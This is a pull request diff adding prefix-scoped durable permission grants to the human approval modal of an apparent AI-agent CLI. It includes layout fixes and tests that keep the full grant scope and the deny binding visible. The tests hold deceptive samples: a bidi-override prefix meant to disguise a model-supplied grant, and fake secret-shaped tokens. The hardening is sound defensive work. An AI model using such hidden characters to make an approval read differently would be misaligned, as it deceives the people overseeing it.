### PR TITLE
feat(permissions): prefix-scoped grants

### DIFF
--- a/crates/cli/src/ui/modern/app.rs
+++ b/crates/cli/src/ui/modern/app.rs
@@ -913,6 +913,7 @@ impl App {
                 description,
                 origin,
                 input_preview,
+                suggested_prefix,
                 respond,
             } => {
                 // FIFO: concurrent asks (e.g. lead + background subagent)
@@ -922,6 +923,7 @@ impl App {
                     description,
                     origin,
                     input_preview,
+                    suggested_prefix,
                     respond,
                 }));
                 // HITL always wins: drop the Ctrl+P palette so keys reach
@@ -4253,6 +4255,7 @@ mod tests {
             description: "rm -rf build".into(),
             origin: None,
             input_preview: None,
+            suggested_prefix: None,
             respond,
         }
     }
@@ -4374,6 +4377,7 @@ mod tests {
             description: "d".into(),
             origin: None,
             input_preview: None,
+            suggested_prefix: None,
             respond,
         });
         assert_eq!(app.waiting_on, WaitingOn::UserInput);
@@ -4439,6 +4443,7 @@ mod tests {
             description: "Bash: run `cargo test`".into(),
             origin: Some("subagent-3".into()),
             input_preview: Some("{\"command\": \"cargo test\"}".into()),
+            suggested_prefix: None,
             respond,
         });
         assert_eq!(app.phase, Phase::Permission);
@@ -4535,6 +4540,7 @@ mod tests {
             description: "lead".into(),
             origin: None,
             input_preview: None,
+            suggested_prefix: None,
             respond: r1,
         });
         app.apply_engine(EngineEvent::PermissionAsk {
@@ -4542,6 +4548,7 @@ mod tests {
             description: "subagent".into(),
             origin: Some("subagent-1".into()),
             input_preview: None,
+            suggested_prefix: None,
             respond: r2,
         });
         // Both are queued; front is the first, badge shows 1 behind.
@@ -4570,6 +4577,7 @@ mod tests {
                 description: name.into(),
                 origin: None,
                 input_preview: None,
+                suggested_prefix: None,
                 respond,
             });
         }

--- a/crates/cli/src/ui/modern/modal.rs
+++ b/crates/cli/src/ui/modern/modal.rs
@@ -20,6 +20,8 @@ pub struct PendingPermission {
     /// line rather than folded into `description`.
     pub origin: Option<String>,
     pub input_preview: Option<String>,
+    /// Prefix offered for a durable grant, when one is safe to offer.
+    pub suggested_prefix: Option<String>,
     pub respond: std::sync::mpsc::Sender<PermissionResponse>,
 }
 
@@ -102,6 +104,14 @@ impl App {
 
     /// Answer the front permission ask and advance the modal queue. No-op if
     /// the front modal is not a permission ask (so a mixed queue is safe).
+    /// The prefix the front permission modal offers, if any.
+    pub fn suggested_prefix(&self) -> Option<String> {
+        match self.modals.front() {
+            Some(Modal::Permission(p)) => p.suggested_prefix.clone(),
+            _ => None,
+        }
+    }
+
     pub fn resolve_permission(&mut self, resp: PermissionResponse) {
         if !matches!(self.modals.front(), Some(Modal::Permission(_))) {
             return;
@@ -116,6 +126,9 @@ impl App {
             // executor and may fail (read-only config dir, full disk) —
             // the modal must not assert storage it cannot observe.
             // `/permissions` lists what actually persisted.
+            PermissionResponse::AllowAlwaysPrefix { ref prefix } => {
+                format!("always allowing commands starting with `{prefix}` (saved)")
+            }
             PermissionResponse::AllowAlways => {
                 format!("always allowing this exact {} call", p.name)
             }

--- a/crates/cli/src/ui/modern/modal.rs
+++ b/crates/cli/src/ui/modern/modal.rs
@@ -127,7 +127,7 @@ impl App {
             // the modal must not assert storage it cannot observe.
             // `/permissions` lists what actually persisted.
             PermissionResponse::AllowAlwaysPrefix { ref prefix } => {
-                format!("always allowing commands starting with `{prefix}` (saved)")
+                format!("always allowing commands starting with `{prefix}`")
             }
             PermissionResponse::AllowAlways => {
                 format!("always allowing this exact {} call", p.name)

--- a/crates/cli/src/ui/modern/palette.rs
+++ b/crates/cli/src/ui/modern/palette.rs
@@ -155,6 +155,7 @@ mod tests {
             description: "run".into(),
             origin: None,
             input_preview: None,
+            suggested_prefix: None,
             respond: tx,
         }));
         app.phase = Phase::Permission;

--- a/crates/cli/src/ui/modern/render.rs
+++ b/crates/cli/src/ui/modern/render.rs
@@ -596,6 +596,40 @@ fn key_hint_line(text: impl Into<String>) -> Line<'static> {
     ))
 }
 
+/// The plain text of a line, for measuring how tall it will render.
+fn line_text(line: &Line<'_>) -> String {
+    line.spans.iter().map(|s| s.content.as_ref()).collect()
+}
+
+/// Rows `text` occupies when word-wrapped into `width` columns, matching
+/// `Paragraph`'s greedy wrap: words move to the next row whole, and a
+/// word wider than the line is split across rows.
+fn wrapped_rows(text: &str, width: u16) -> u16 {
+    if width == 0 {
+        return 1;
+    }
+    let width = width as usize;
+    let mut rows = 1usize;
+    let mut col = 0usize;
+    for word in text.split_whitespace() {
+        let len = word.chars().count();
+        if col > 0 && col + 1 + len > width {
+            rows += 1;
+            col = 0;
+        }
+        if len > width {
+            // The check above already moved a partly-filled row on, so
+            // the split always starts at column 0.
+            let extra = (len - 1) / width;
+            rows += extra;
+            col = len - extra * width;
+        } else {
+            col = if col == 0 { len } else { col + 1 + len };
+        }
+    }
+    rows.try_into().unwrap_or(u16::MAX)
+}
+
 /// Shared centered modal box with a border + title and an optional sticky
 /// footer (key hints). The footer is laid out in its own row so wrapped body
 /// text cannot push it off-screen.
@@ -609,8 +643,18 @@ fn draw_modal_box(
 ) {
     let width = area.width.saturating_sub(6).clamp(40, 76);
     let footer_h: u16 = u16::from(footer.is_some());
+    // Size the body from the rows the text will actually occupy once
+    // wrapped, not from the number of `Line`s. A single long line —
+    // the permission modal's durable-grant row is the one that can run
+    // long — otherwise claimed one row and was clipped after the modal
+    // had already been sized, hiding content the user is answering
+    // about.
+    let body_rows: u16 = lines
+        .iter()
+        .map(|l| wrapped_rows(&line_text(l), width.saturating_sub(2)))
+        .fold(0u16, |a, b| a.saturating_add(b));
     // +2 border, +footer, +1 breathing room for wrap
-    let wanted = (lines.len() as u16)
+    let wanted = body_rows
         .saturating_add(2)
         .saturating_add(footer_h)
         .saturating_add(1);
@@ -1673,16 +1717,12 @@ mod tests {
                 ));
             term.draw(|f| draw(f, &mut app)).unwrap();
             let s = buffer_to_string(term.backend().buffer());
-            // The body wraps, so the prefix may be split across rows;
-            // dropping the box borders and collapsing whitespace
-            // reassembles it.
-            let flat = s
-                .replace(['│', '┌', '┐', '└', '┘', '─'], " ")
-                .split_whitespace()
-                .collect::<Vec<_>>()
-                .join(" ");
+            // The body wraps, so the prefix may be split across rows —
+            // possibly mid-word. Dropping borders and every space
+            // reassembles it either way.
+            let flat = squeeze(&s);
             assert!(
-                flat.contains(prefix),
+                flat.contains(&squeeze(prefix)),
                 "the prefix was not fully visible at {cols} columns:\n{s}"
             );
             assert!(
@@ -1690,6 +1730,68 @@ mod tests {
                 "the prefix binding vanished at {cols} columns:\n{s}"
             );
         }
+    }
+
+    /// The modal is sized from the rows its text actually occupies. A
+    /// prefix long enough to wrap several times counted as one line, so
+    /// the box was sized too short and clipped the rest of it — while
+    /// `[P]` stayed live over a scope the user could not finish reading.
+    #[test]
+    fn permission_modal_grows_for_a_prefix_that_wraps_many_rows() {
+        let prefix = format!(
+            "/opt/{}/bin/kubectl rollout",
+            "very-long-directory".repeat(6)
+        );
+        for cols in [60u16, 80, 120] {
+            let backend = TestBackend::new(cols, 40);
+            let mut term = Terminal::new(backend).unwrap();
+            let mut app = App::new("m", "/tmp", "s");
+            app.phase = Phase::Permission;
+            let (respond, _rx) = std::sync::mpsc::channel();
+            app.modals
+                .push_back(crate::ui::modern::app::Modal::Permission(
+                    PendingPermission {
+                        name: "Bash".into(),
+                        description: "Bash: run a command".into(),
+                        origin: None,
+                        input_preview: None,
+                        suggested_prefix: Some(prefix.clone()),
+                        respond,
+                    },
+                ));
+            term.draw(|f| draw(f, &mut app)).unwrap();
+            let s = buffer_to_string(term.backend().buffer());
+            let flat = squeeze(&s);
+            assert!(
+                flat.contains(&squeeze(&prefix)),
+                "a wrapping prefix was clipped at {cols} columns:\n{s}"
+            );
+            // The description it pushed down must survive too.
+            assert!(
+                flat.contains(&squeeze("Bash: run a command")),
+                "the modal body was clipped at {cols} columns:\n{s}"
+            );
+        }
+    }
+
+    /// Screen text with the box borders and all whitespace removed, so a
+    /// string that wrapped across rows — even mid-word — can still be
+    /// searched for as one piece.
+    fn squeeze(s: &str) -> String {
+        s.chars()
+            .filter(|c| !c.is_whitespace() && !"│┌┐└┘─".contains(*c))
+            .collect()
+    }
+
+    #[test]
+    fn wrapped_rows_counts_greedy_word_wrap() {
+        assert_eq!(wrapped_rows("", 10), 1);
+        assert_eq!(wrapped_rows("short", 10), 1);
+        // Wraps whole words to the next row.
+        assert_eq!(wrapped_rows("aaaa bbbb cccc", 10), 2);
+        // A word wider than the line is split across rows.
+        assert_eq!(wrapped_rows(&"x".repeat(25), 10), 3);
+        assert_eq!(wrapped_rows("ab", 0), 1);
     }
 
     /// The modal title names the tool being approved. A plugin manifest or

--- a/crates/cli/src/ui/modern/render.rs
+++ b/crates/cli/src/ui/modern/render.rs
@@ -988,7 +988,14 @@ fn draw_permission_modal(
         // Keep ≤ 40 cols so min-width modals still show every binding —
         // the deny action must never be the one that gets clipped.
         // Esc denies too, and digits 1/2/4 mirror y/a/A; both in /help.
-        Some(key_hint_line("[y] once [a] session [A] always [n] deny")),
+        Some(key_hint_line(&match pending.suggested_prefix.as_deref() {
+            // Name the prefix in the hint. "[P] prefix" would make the
+            // user guess what they are about to approve.
+            Some(prefix) => {
+                format!("[y] once [a] session [A] always [P] always `{prefix}` [n] deny")
+            }
+            None => "[y] once [a] session [A] always [n] deny".to_string(),
+        })),
     );
 }
 
@@ -1574,6 +1581,7 @@ mod tests {
                     description: format!("Bash: run `{attack}`"),
                     origin: None,
                     input_preview: Some(format!("{{\n  \"command\": \"{attack}\"\n}}")),
+                    suggested_prefix: None,
                     respond,
                 },
             ));
@@ -1603,6 +1611,7 @@ mod tests {
                     description: "run plugin".into(),
                     origin: None,
                     input_preview: None,
+                    suggested_prefix: None,
                     respond,
                 },
             ));
@@ -2172,6 +2181,7 @@ mod tests {
                     description: "Bash: run `cargo publish`".into(),
                     origin: Some("subagent-2".into()),
                     input_preview: Some("{\n  \"command\": \"cargo publish\"\n}".into()),
+                    suggested_prefix: None,
                     respond,
                 },
             ));
@@ -2208,6 +2218,7 @@ mod tests {
                     description: "big input".into(),
                     origin: None,
                     input_preview: Some(preview),
+                    suggested_prefix: None,
                     respond,
                 },
             ));
@@ -2264,6 +2275,7 @@ mod tests {
                         "Bash: run a long pipeline that wraps across many columns and rows".into(),
                     origin: None,
                     input_preview: Some(preview),
+                    suggested_prefix: None,
                     respond,
                 },
             ));
@@ -2355,6 +2367,7 @@ mod tests {
                         description: format!("{name} ask"),
                         origin: None,
                         input_preview: None,
+                        suggested_prefix: None,
                         respond,
                     },
                 ));

--- a/crates/cli/src/ui/modern/render.rs
+++ b/crates/cli/src/ui/modern/render.rs
@@ -990,9 +990,16 @@ fn draw_permission_modal(
         // Esc denies too, and digits 1/2/4 mirror y/a/A; both in /help.
         Some(key_hint_line(&match pending.suggested_prefix.as_deref() {
             // Name the prefix in the hint. "[P] prefix" would make the
-            // user guess what they are about to approve.
+            // user guess what they are about to approve. Escaped like
+            // every other untrusted string in this modal: the prefix is
+            // derived from the model-supplied command, and a bidi or
+            // zero-width control in it would make the durable grant read
+            // as something other than the bytes to be persisted.
             Some(prefix) => {
-                format!("[y] once [a] session [A] always [P] always `{prefix}` [n] deny")
+                format!(
+                    "[y] once [a] session [A] always [P] always `{}` [n] deny",
+                    escape_deceptive(prefix)
+                )
             }
             None => "[y] once [a] session [A] always [n] deny".to_string(),
         })),
@@ -1592,6 +1599,41 @@ mod tests {
             "a bidi override reached the screen:\n{s}"
         );
         assert!(s.contains("<U+202E>"), "override not surfaced:\n{s}");
+    }
+
+    /// `[P]` approves a *durable* grant, so the prefix beside it has to
+    /// read as the bytes that will be persisted and later authorized. The
+    /// prefix is derived from the model-supplied command, so a bidi
+    /// override in it would make the footer advertise a different grant
+    /// from the one being made.
+    #[test]
+    fn permission_modal_reveals_a_bidi_override_in_the_offered_prefix() {
+        let backend = TestBackend::new(100, 24);
+        let mut term = Terminal::new(backend).unwrap();
+        let mut app = App::new("m", "/tmp", "s");
+        app.phase = Phase::Permission;
+        let (respond, _rx) = std::sync::mpsc::channel();
+        app.modals
+            .push_back(crate::ui::modern::app::Modal::Permission(
+                PendingPermission {
+                    name: "Bash".into(),
+                    description: "Bash: run a command".into(),
+                    origin: None,
+                    input_preview: None,
+                    suggested_prefix: Some("git\u{202e}sutats".into()),
+                    respond,
+                },
+            ));
+        term.draw(|f| draw(f, &mut app)).unwrap();
+        let s = buffer_to_string(term.backend().buffer());
+        assert!(
+            !s.contains('\u{202e}'),
+            "a bidi override in the offered prefix reached the screen:\n{s}"
+        );
+        assert!(
+            s.contains("git<U+202E>sutats"),
+            "override in the offered prefix not surfaced:\n{s}"
+        );
     }
 
     /// The modal title names the tool being approved. A plugin manifest or

--- a/crates/cli/src/ui/modern/render.rs
+++ b/crates/cli/src/ui/modern/render.rs
@@ -913,6 +913,24 @@ fn draw_permission_modal(
     scroll: usize,
 ) {
     let mut lines: Vec<Line<'static>> = Vec::new();
+    // The durable grant leads the body, not the footer. The footer is a
+    // single fixed row that cannot wrap, so a narrow terminal truncated
+    // the tail of the prefix while `[P]` stayed live — a durable grant
+    // whose full scope the user could not read. Here it wraps, and being
+    // the first row it survives however short the modal gets. Escaped
+    // like every other untrusted string in this modal: the prefix is
+    // derived from a model-supplied command, and a bidi or zero-width
+    // control in it would make the grant read as something other than
+    // the bytes to be persisted.
+    if let Some(ref prefix) = pending.suggested_prefix {
+        lines.push(Line::from(Span::styled(
+            format!("[P] always allow: {}", escape_deceptive(prefix)),
+            Style::default()
+                .fg(palette().warning)
+                .add_modifier(Modifier::BOLD),
+        )));
+        lines.push(Line::from(""));
+    }
     if pending_behind > 0 {
         lines.push(Line::from(Span::styled(
             format!("⚠ {pending_behind} more pending"),
@@ -988,20 +1006,12 @@ fn draw_permission_modal(
         // Keep ≤ 40 cols so min-width modals still show every binding —
         // the deny action must never be the one that gets clipped.
         // Esc denies too, and digits 1/2/4 mirror y/a/A; both in /help.
-        Some(key_hint_line(&match pending.suggested_prefix.as_deref() {
-            // Name the prefix in the hint. "[P] prefix" would make the
-            // user guess what they are about to approve. Escaped like
-            // every other untrusted string in this modal: the prefix is
-            // derived from the model-supplied command, and a bidi or
-            // zero-width control in it would make the durable grant read
-            // as something other than the bytes to be persisted.
-            Some(prefix) => {
-                format!(
-                    "[y] once [a] session [A] always [P] always `{}` [n] deny",
-                    escape_deceptive(prefix)
-                )
-            }
-            None => "[y] once [a] session [A] always [n] deny".to_string(),
+        // The prefix itself is NOT named here: it is variable-length, and
+        // this row cannot wrap. The body row above carries the scope.
+        Some(key_hint_line(if pending.suggested_prefix.is_some() {
+            "[y] once [a] session [A] always [P] prefix [n] deny"
+        } else {
+            "[y] once [a] session [A] always [n] deny"
         })),
     );
 }
@@ -1634,6 +1644,52 @@ mod tests {
             s.contains("git<U+202E>sutats"),
             "override in the offered prefix not surfaced:\n{s}"
         );
+    }
+
+    /// `[P]` creates a *durable* grant, so its full scope has to be
+    /// readable before the key is live. The hint used to live in the
+    /// one-row footer, which cannot wrap: at 60 columns the prefix tail
+    /// was truncated while `[P]` still worked.
+    #[test]
+    fn permission_modal_shows_the_whole_prefix_on_a_narrow_terminal() {
+        // Long enough that no single row of a narrow modal could hold it.
+        let prefix = "/usr/local/bin/kubectl rollout-status-with-a-long-name";
+        for cols in [46u16, 60, 80, 120] {
+            let backend = TestBackend::new(cols, 24);
+            let mut term = Terminal::new(backend).unwrap();
+            let mut app = App::new("m", "/tmp", "s");
+            app.phase = Phase::Permission;
+            let (respond, _rx) = std::sync::mpsc::channel();
+            app.modals
+                .push_back(crate::ui::modern::app::Modal::Permission(
+                    PendingPermission {
+                        name: "Bash".into(),
+                        description: "Bash: run a command".into(),
+                        origin: None,
+                        input_preview: None,
+                        suggested_prefix: Some(prefix.into()),
+                        respond,
+                    },
+                ));
+            term.draw(|f| draw(f, &mut app)).unwrap();
+            let s = buffer_to_string(term.backend().buffer());
+            // The body wraps, so the prefix may be split across rows;
+            // dropping the box borders and collapsing whitespace
+            // reassembles it.
+            let flat = s
+                .replace(['│', '┌', '┐', '└', '┘', '─'], " ")
+                .split_whitespace()
+                .collect::<Vec<_>>()
+                .join(" ");
+            assert!(
+                flat.contains(prefix),
+                "the prefix was not fully visible at {cols} columns:\n{s}"
+            );
+            assert!(
+                s.contains("[P]"),
+                "the prefix binding vanished at {cols} columns:\n{s}"
+            );
+        }
     }
 
     /// The modal title names the tool being approved. A plugin manifest or

--- a/crates/cli/src/ui/modern/render.rs
+++ b/crates/cli/src/ui/modern/render.rs
@@ -604,7 +604,13 @@ fn line_text(line: &Line<'_>) -> String {
 /// Rows `text` occupies when word-wrapped into `width` columns, matching
 /// `Paragraph`'s greedy wrap: words move to the next row whole, and a
 /// word wider than the line is split across rows.
+///
+/// Measured in display columns, not characters. A CJK glyph or emoji
+/// occupies two cells, so counting characters underestimates the rows a
+/// line needs and the box would be sized too short — clipping the very
+/// text the user is answering about.
 fn wrapped_rows(text: &str, width: u16) -> u16 {
+    use unicode_width::{UnicodeWidthChar, UnicodeWidthStr};
     if width == 0 {
         return 1;
     }
@@ -612,19 +618,25 @@ fn wrapped_rows(text: &str, width: u16) -> u16 {
     let mut rows = 1usize;
     let mut col = 0usize;
     for word in text.split_whitespace() {
-        let len = word.chars().count();
-        if col > 0 && col + 1 + len > width {
+        let w = UnicodeWidthStr::width(word);
+        if col > 0 && col + 1 + w > width {
             rows += 1;
             col = 0;
         }
-        if len > width {
-            // The check above already moved a partly-filled row on, so
-            // the split always starts at column 0.
-            let extra = (len - 1) / width;
-            rows += extra;
-            col = len - extra * width;
+        if w > width {
+            // Split by columns, not by characters: a double-width glyph
+            // straddling the edge moves to the next row whole.
+            // The check above already emptied a partly-filled row.
+            for ch in word.chars() {
+                let cw = UnicodeWidthChar::width(ch).unwrap_or(0);
+                if col + cw > width {
+                    rows += 1;
+                    col = 0;
+                }
+                col += cw;
+            }
         } else {
-            col = if col == 0 { len } else { col + 1 + len };
+            col = if col == 0 { w } else { col + 1 + w };
         }
     }
     rows.try_into().unwrap_or(u16::MAX)
@@ -1792,6 +1804,55 @@ mod tests {
         // A word wider than the line is split across rows.
         assert_eq!(wrapped_rows(&"x".repeat(25), 10), 3);
         assert_eq!(wrapped_rows("ab", 0), 1);
+    }
+
+    /// Rows are display columns, not characters. A CJK glyph takes two
+    /// cells, so ten of them fill a 20-column line — counting characters
+    /// would call that one row and size the modal half as tall as it
+    /// needs to be.
+    #[test]
+    fn wrapped_rows_measures_display_width() {
+        let cjk = "日".repeat(10); // 10 chars, 20 columns
+        assert_eq!(wrapped_rows(&cjk, 20), 1);
+        assert_eq!(wrapped_rows(&cjk, 10), 2);
+        assert_eq!(wrapped_rows(&cjk, 6), 4);
+        // An odd width cannot split a double-width glyph, so the row
+        // ends one column early.
+        assert_eq!(wrapped_rows(&cjk, 5), 5);
+    }
+
+    /// The permission modal must grow for double-width text too, or the
+    /// durable-grant row is clipped exactly as it was for long prefixes.
+    #[test]
+    fn permission_modal_grows_for_double_width_text() {
+        let backend = TestBackend::new(60, 40);
+        let mut term = Terminal::new(backend).unwrap();
+        let mut app = App::new("m", "/tmp", "s");
+        app.phase = Phase::Permission;
+        let (respond, _rx) = std::sync::mpsc::channel();
+        let description = format!("Bash: {}", "日本語".repeat(20));
+        app.modals
+            .push_back(crate::ui::modern::app::Modal::Permission(
+                PendingPermission {
+                    name: "Bash".into(),
+                    description: description.clone(),
+                    origin: None,
+                    input_preview: None,
+                    suggested_prefix: Some("git status".into()),
+                    respond,
+                },
+            ));
+        term.draw(|f| draw(f, &mut app)).unwrap();
+        let s = buffer_to_string(term.backend().buffer());
+        let flat = squeeze(&s);
+        assert!(
+            flat.contains(&squeeze(&description)),
+            "double-width text was clipped:\n{s}"
+        );
+        assert!(
+            flat.contains(&squeeze("git status")),
+            "the durable-grant row was pushed out:\n{s}"
+        );
     }
 
     /// The modal title names the tool being approved. A plugin manifest or

--- a/crates/cli/src/ui/modern/render.rs
+++ b/crates/cli/src/ui/modern/render.rs
@@ -654,7 +654,14 @@ fn draw_modal_box(
     footer: Option<Line<'static>>,
 ) {
     let width = area.width.saturating_sub(6).clamp(40, 76);
-    let footer_h: u16 = u16::from(footer.is_some());
+    // The footer gets the rows its hints actually need. It used to be a
+    // single row whatever it held, so on a narrow terminal ratatui
+    // clipped the tail — and the tail is `[n] deny`, the one binding
+    // that must never be the one to disappear while its key stays live.
+    let footer_h: u16 = footer
+        .as_ref()
+        .map(|l| wrapped_rows(&line_text(l), width.saturating_sub(2)))
+        .unwrap_or(0);
     // Size the body from the rows the text will actually occupy once
     // wrapped, not from the number of `Line`s. A single long line —
     // the permission modal's durable-grant row is the one that can run
@@ -686,7 +693,8 @@ fn draw_modal_box(
     frame.render_widget(block, rect);
 
     if let Some(footer_line) = footer {
-        let body_h = inner.height.saturating_sub(1);
+        let foot_h = footer_h.min(inner.height);
+        let body_h = inner.height.saturating_sub(foot_h);
         let body = Rect {
             x: inner.x,
             y: inner.y,
@@ -697,11 +705,12 @@ fn draw_modal_box(
             x: inner.x,
             y: inner.y.saturating_add(body_h),
             width: inner.width,
-            height: 1,
+            height: foot_h,
         };
         frame.render_widget(Paragraph::new(lines).wrap(Wrap { trim: false }), body);
-        // Fixed footer: key hints always land on the last inner row.
-        frame.render_widget(Paragraph::new(footer_line), foot);
+        // Sticky footer: key hints always land on the last inner rows,
+        // wrapping within them rather than being cut off.
+        frame.render_widget(Paragraph::new(footer_line).wrap(Wrap { trim: false }), foot);
     } else {
         frame.render_widget(Paragraph::new(lines).wrap(Wrap { trim: false }), inner);
     }
@@ -1741,6 +1750,49 @@ mod tests {
                 s.contains("[P]"),
                 "the prefix binding vanished at {cols} columns:\n{s}"
             );
+            // Every binding stays readable. `[n] deny` is the one that
+            // used to fall off the end of a one-row footer while its key
+            // stayed live.
+            for hint in ["[y]", "[a]", "[A]", "[P]", "[n]deny"] {
+                assert!(
+                    flat.contains(hint),
+                    "binding {hint} was clipped at {cols} columns:\n{s}"
+                );
+            }
+        }
+    }
+
+    /// The deny binding must survive the narrowest supported modal even
+    /// when no prefix is offered — the plain footer is 40 columns and the
+    /// inner width at a 46-column terminal is 38.
+    #[test]
+    fn permission_modal_keeps_every_binding_at_the_narrowest_width() {
+        for prefix in [None, Some("git status".to_string())] {
+            let backend = TestBackend::new(46, 24);
+            let mut term = Terminal::new(backend).unwrap();
+            let mut app = App::new("m", "/tmp", "s");
+            app.phase = Phase::Permission;
+            let (respond, _rx) = std::sync::mpsc::channel();
+            app.modals
+                .push_back(crate::ui::modern::app::Modal::Permission(
+                    PendingPermission {
+                        name: "Bash".into(),
+                        description: "Bash: run a command".into(),
+                        origin: None,
+                        input_preview: None,
+                        suggested_prefix: prefix.clone(),
+                        respond,
+                    },
+                ));
+            term.draw(|f| draw(f, &mut app)).unwrap();
+            let s = buffer_to_string(term.backend().buffer());
+            let flat = squeeze(&s);
+            for hint in ["[y]once", "[a]session", "[A]always", "[n]deny"] {
+                assert!(
+                    flat.contains(hint),
+                    "binding {hint} was clipped with prefix={prefix:?}:\n{s}"
+                );
+            }
         }
     }
 

--- a/crates/cli/src/ui/modern/run.rs
+++ b/crates/cli/src/ui/modern/run.rs
@@ -1137,6 +1137,16 @@ fn handle_key(app: &mut App, key: KeyEvent) {
                 (_, KeyCode::Char('A')) | (_, KeyCode::Char('4')) => {
                     app.resolve_permission(PermissionResponse::AllowAlways);
                 }
+                // `P` grants the offered prefix. Only bound when one is
+                // offered, so it cannot fire for a command the gate could
+                // not reason about.
+                (_, KeyCode::Char('P')) | (_, KeyCode::Char('5'))
+                    if app.suggested_prefix().is_some() =>
+                {
+                    if let Some(prefix) = app.suggested_prefix() {
+                        app.resolve_permission(PermissionResponse::AllowAlwaysPrefix { prefix });
+                    }
+                }
                 (_, KeyCode::Char('a')) | (_, KeyCode::Char('2')) => {
                     app.resolve_permission(PermissionResponse::AllowSession);
                 }
@@ -2268,6 +2278,7 @@ mod tests {
                         .collect::<Vec<_>>()
                         .join("\n"),
                 ),
+                suggested_prefix: None,
                 respond: tx,
             },
         ));
@@ -2309,6 +2320,7 @@ mod tests {
                 description: "run".into(),
                 origin: None,
                 input_preview: None,
+                suggested_prefix: None,
                 respond: tx,
             },
         ));
@@ -2333,6 +2345,7 @@ mod tests {
                 description: "run".into(),
                 origin: None,
                 input_preview: None,
+                suggested_prefix: None,
                 respond: tx,
             },
         ));
@@ -2426,6 +2439,7 @@ mod tests {
                 description: "run".into(),
                 origin: None,
                 input_preview: None,
+                suggested_prefix: None,
                 respond: tx,
             },
         ));
@@ -2458,6 +2472,7 @@ mod tests {
                 description: "run".into(),
                 origin: None,
                 input_preview: None,
+                suggested_prefix: None,
                 respond: tx,
             },
         ));
@@ -2857,6 +2872,7 @@ mod tests {
                     description: "d".into(),
                     origin: None,
                     input_preview: None,
+                    suggested_prefix: None,
                     respond,
                 },
             ));

--- a/crates/cli/src/ui/modern/sink.rs
+++ b/crates/cli/src/ui/modern/sink.rs
@@ -103,6 +103,10 @@ pub enum EngineEvent {
         /// renders it distinctly instead of splicing it into `description`.
         origin: Option<String>,
         input_preview: Option<String>,
+        /// A prefix the user could grant durably (`git status`), when the
+        /// gate can reason about the command. `None` means offer only an
+        /// exact grant.
+        suggested_prefix: Option<String>,
         respond: std::sync::mpsc::Sender<PermissionResponse>,
     },
     /// A plan was proposed via ExitPlanMode (plan §M6). Fire-and-forget:
@@ -145,6 +149,7 @@ impl PermissionPrompter for ModernPrompter {
         description: &str,
         input_preview: Option<&str>,
         origin: Option<&str>,
+        suggested_prefix: Option<&str>,
     ) -> PermissionResponse {
         let (resp_tx, resp_rx) = std::sync::mpsc::channel();
         let sent = self.tx.send(EngineEvent::PermissionAsk {
@@ -152,6 +157,7 @@ impl PermissionPrompter for ModernPrompter {
             description: description.to_string(),
             origin: origin.filter(|o| !o.is_empty()).map(str::to_string),
             input_preview: input_preview.map(str::to_string),
+            suggested_prefix: suggested_prefix.map(str::to_string),
             respond: resp_tx,
         });
         if sent.is_err() {
@@ -547,7 +553,7 @@ mod tests {
         let (tx, rx) = mpsc::unbounded_channel();
         let prompter = ModernPrompter::new(tx);
         drop(rx);
-        let resp = prompter.ask("Bash", "run", None, None);
+        let resp = prompter.ask("Bash", "run", None, None, None);
         assert!(matches!(resp, PermissionResponse::Deny));
     }
 
@@ -555,7 +561,7 @@ mod tests {
     fn prompter_denies_when_responder_dropped() {
         let (tx, mut rx) = mpsc::unbounded_channel();
         let prompter = ModernPrompter::new(tx);
-        let worker = std::thread::spawn(move || prompter.ask("Bash", "run", None, None));
+        let worker = std::thread::spawn(move || prompter.ask("Bash", "run", None, None, None));
         // Receive the ask, then drop it (and its responder) unanswered.
         let ev = loop {
             match rx.try_recv() {
@@ -572,7 +578,7 @@ mod tests {
         let (tx, mut rx) = mpsc::unbounded_channel();
         let prompter = ModernPrompter::new(tx);
         let worker =
-            std::thread::spawn(move || prompter.ask("Bash", "cargo test", Some("{}"), None));
+            std::thread::spawn(move || prompter.ask("Bash", "cargo test", Some("{}"), None, None));
         let ev = loop {
             match rx.try_recv() {
                 Ok(ev) => break ev,

--- a/crates/cli/src/ui/modern/snapshot.rs
+++ b/crates/cli/src/ui/modern/snapshot.rs
@@ -288,6 +288,7 @@ mod frames {
                 description: "Bash: run `cargo test`".into(),
                 origin: None,
                 input_preview: Some("{\n  \"command\": \"cargo test\"\n}".into()),
+                suggested_prefix: None,
                 respond,
             }));
         });

--- a/crates/lib/src/permissions/grants.rs
+++ b/crates/lib/src/permissions/grants.rs
@@ -448,13 +448,10 @@ mod tests {
             derive_prefix("cargo build --release").as_deref(),
             Some("cargo build")
         );
-        // A path-qualified binary keeps its spelling. Reducing it to
-        // `git status` would persist a grant that never matches the
-        // command it came from, because matching sees the raw text.
-        assert_eq!(
-            derive_prefix("/usr/bin/git status").as_deref(),
-            Some("/usr/bin/git status")
-        );
+        // A path-qualified binary is refused outright. The path is
+        // user-controlled and can carry a credential, and there is no
+        // safe way to fold it into a plaintext prefix.
+        assert_eq!(derive_prefix("/usr/bin/git status"), None);
     }
 
     /// The bare binary is never offered, with or without flags. The
@@ -492,10 +489,8 @@ mod tests {
             r"./\* status",
             r"'*' status",
             r"\? status",
-            // Path-qualified spellings of a tool that IS listed, so the
-            // glob rule is what rejects these rather than the tool list.
-            "/usr/*/git status",
-            "/usr/bin/gi?/git status",
+            "gi?t status",
+            "gi*t status",
         ] {
             assert_eq!(
                 derive_prefix(cmd),
@@ -551,6 +546,13 @@ mod tests {
             "./deploy.sh staging",
             "python manage.py",
             "node server.js",
+            // A listed tool followed by identifier-shaped secret data.
+            // The binary is known; the argument is not a subcommand it
+            // defines, and shape alone cannot tell it from one.
+            "git 0123456789abcdef0123456789abcdef",
+            "cargo 0123456789abcdef0123456789abcdef",
+            "docker AKIAIOSFODNN7EXAMPLE",
+            "kubectl ghp-0123456789abcdefghijklmnop",
         ] {
             assert_eq!(
                 derive_prefix(cmd),
@@ -559,11 +561,15 @@ mod tests {
             );
         }
 
-        // The listed tools still work, path-qualified or not.
+        // Real subcommands of those same tools still work.
         assert_eq!(derive_prefix("git status").as_deref(), Some("git status"));
         assert_eq!(
-            derive_prefix("/usr/local/bin/cargo test --lib").as_deref(),
-            Some("/usr/local/bin/cargo test")
+            derive_prefix("cargo test --lib").as_deref(),
+            Some("cargo test")
+        );
+        assert_eq!(
+            derive_prefix("git rev-parse --short HEAD").as_deref(),
+            Some("git rev-parse")
         );
     }
 
@@ -666,10 +672,10 @@ mod tests {
         for cmd in [
             "git status --porcelain",
             "cargo build --release",
-            "/usr/bin/git status",
             "npm run build",
             "docker compose up",
             "kubectl get pods",
+            "git rev-parse HEAD",
         ] {
